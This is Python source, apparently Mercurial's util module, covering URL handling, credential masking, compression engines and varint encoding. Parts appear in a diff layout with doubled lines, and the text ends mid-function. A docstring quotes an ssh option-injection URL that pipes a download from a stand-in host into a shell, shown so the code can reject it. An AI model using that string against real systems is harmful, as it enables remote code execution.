        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

2851 def hasscheme(path):
2852 def hasscheme(path):
2852 return bool(url(path).scheme)
2853 return bool(url(path).scheme)
2853
2854
2854 def hasdriveletter(path):
2855 def hasdriveletter(path):
2855 return path and path[1:2] == ':' and path[0:1].isalpha()
2856 return path and path[1:2] == ':' and path[0:1].isalpha()
2856
2857
2857 def urllocalpath(path):
2858 def urllocalpath(path):
2858 return url(path, parsequery=False, parsefragment=False).localpath()
2859 return url(path, parsequery=False, parsefragment=False).localpath()
2859
2860
2860 def checksafessh(path):
2861 def checksafessh(path):
2861 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2862 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2862
2863
2863 This is a sanity check for ssh urls. ssh will parse the first item as
2864 This is a sanity check for ssh urls. ssh will parse the first item as
2864 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2865 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2865 Let's prevent these potentially exploited urls entirely and warn the
2866 Let's prevent these potentially exploited urls entirely and warn the
2866 user.
2867 user.
2867
2868
2868 Raises an error.Abort when the url is unsafe.
2869 Raises an error.Abort when the url is unsafe.
2869 """
2870 """
2870 path = urlreq.unquote(path)
2871 path = urlreq.unquote(path)
2871 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2872 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2872 raise error.Abort(_('potentially unsafe url: %r') %
2873 raise error.Abort(_('potentially unsafe url: %r') %
2873 (pycompat.bytestr(path),))
2874 (pycompat.bytestr(path),))
2874
2875
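# Illustrative sketch (not part of the original module; the helper name is
# made up): how checksafessh() behaves on a benign url versus one whose
# "host" would be parsed by ssh as a command-line option.
def _examplechecksafessh():
    checksafessh(b'ssh://user@example.com/repo')      # fine, returns None
    try:
        checksafessh(b'ssh://-oProxyCommand=evil/x')  # host parses as an option
    except error.Abort:
        return True                                   # the unsafe url was rejected
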
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

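# Illustrative sketch (hypothetical values): hidepassword() masks only the
# password, while removeauth() strips both the user name and the password.
def _examplescrubcredentials():
    u = b'http://alice:hunter2@example.com/repo'
    masked = hidepassword(u)   # b'http://alice:***@example.com/repo'
    bare = removeauth(u)       # b'http://example.com/repo'
    return masked, bare
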
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

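# Illustrative sketch, assuming unitcountfn() (defined earlier in this file)
# picks the first row of the table whose threshold the value meets, so the
# displayed precision scales with magnitude. Expected renderings are in the
# comments.
def _exampletimecount():
    return (timecount(2.5),      # '2.500 s'
            timecount(0.042),    # '42.00 ms'
            timecount(0.000007)) # '7.000 us'
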
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr = procutil.stderr
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

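# Illustrative sketch tying finddirs() and the dirs multiset together
# (a plain list of paths is used for illustration; either the pure-Python
# class above or parsers.dirs should behave the same): a directory stays
# in the set until its last file is deleted.
def _exampledirs():
    assert list(finddirs('a/b/f')) == ['a/b', 'a']
    d = dirs(['a/b/f1', 'a/b/f2'])
    d.delpath('a/b/f1')
    assert 'a/b' in d       # one file still lives under a/b
    d.delpath('a/b/f2')
    assert 'a/b' not in d   # last file gone, directory entry dropped
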
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

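# Illustrative roundtrip sketch using the zlib engine registered above,
# assuming the chunkbuffer helper defined earlier in this file:
# compressstream() consumes an iterator of byte chunks, and
# decompressorreader() wraps a file object holding the compressed result.
def _examplezlibroundtrip(data=b'spam' * 1000):
    import io
    engine = compengines['zlib']
    compressed = b''.join(engine.compressstream(iter([data])))
    reader = engine.decompressorreader(io.BytesIO(compressed))
    return reader.read(len(data)) == data  # True
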
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

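# Illustrative sketch: ordering engines for server-side advertisement. With
# the registrations above and the zstd module importable, the priorities
# (zstd 50, zlib 20, bzip2/none 0) yield the order in the comment; callers
# that actually advertise are expected to drop the non-positive entries.
def _exampleserverorder():
    engines = compengines.supportedwireengines(SERVERROLE)
    return [e.name() for e in engines]  # ['zstd', 'zlib', 'bzip2', 'none']
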
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that f can safely be renamed to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

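# Illustrative sketch (a plain set stands in for the context, which only
# needs to support the ``in`` operator here): collisions get an increasing
# ~number suffix.
def _examplesafename():
    taken = {'foo~resolved', 'foo~resolved~1'}
    return safename('foo', 'resolved', taken)  # 'foo~resolved~2'
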
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

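# Illustrative sketch: unlike a bare read(), readexactly() treats a short
# read as a hard error instead of silently returning fewer bytes.
def _examplereadexactly():
    import io
    assert readexactly(io.BytesIO(b'abcdef'), 4) == b'abcd'
    try:
        readexactly(io.BytesIO(b'ab'), 4)  # only 2 bytes available
    except error.Abort:
        return True
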
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

3758 def uvarintdecodestream(fh):
3759 def uvarintdecodestream(fh):
3759 """Decode an unsigned variable length integer from a stream.
3760 """Decode an unsigned variable length integer from a stream.
3760
3761
3761 The passed argument is anything that has a ``.read(N)`` method.
3762 The passed argument is anything that has a ``.read(N)`` method.
3762
3763
3763 >>> try:
3764 >>> try:
3764 ... from StringIO import StringIO as BytesIO
3765 ... from StringIO import StringIO as BytesIO
3765 ... except ImportError:
3766 ... except ImportError:
3766 ... from io import BytesIO
3767 ... from io import BytesIO
3767 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3768 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3768 0
3769 0
3769 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3770 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3770 1
3771 1
3771 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3772 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3772 127
3773 127
3773 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3774 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3774 1337
3775 1337
3775 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3776 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3776 65536
3777 65536
3777 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3778 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3778 Traceback (most recent call last):
3779 Traceback (most recent call last):
3779 ...
3780 ...
3780 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3781 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3781 """
3782 """
3782 result = 0
3783 result = 0
3783 shift = 0
3784 shift = 0
3784 while True:
3785 while True:
3785 byte = ord(readexactly(fh, 1))
3786 byte = ord(readexactly(fh, 1))
3786 result |= ((byte & 0x7f) << shift)
3787 result |= ((byte & 0x7f) << shift)
3787 if not (byte & 0x80):
3788 if not (byte & 0x80):
3788 return result
3789 return result
3789 shift += 7
3790 shift += 7
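
The varint scheme above is a plain LEB128-style encoding. As a sanity check,
here is a standalone round-trip sketch of the same format (hypothetical helper
names; Python 3; no Mercurial imports assumed):

    import io

    def encode_uvarint(value):
        # low 7 bits per byte, least significant group first; the high bit
        # is set on every byte except the last
        if value < 0:
            raise ValueError('negative value for uvarint: %d' % value)
        out = bytearray()
        while value > 0x7f:
            out.append(0x80 | (value & 0x7f))
            value >>= 7
        out.append(value)
        return bytes(out)

    def decode_uvarint(fh):
        # mirrors uvarintdecodestream: accumulate 7 bits per byte until a
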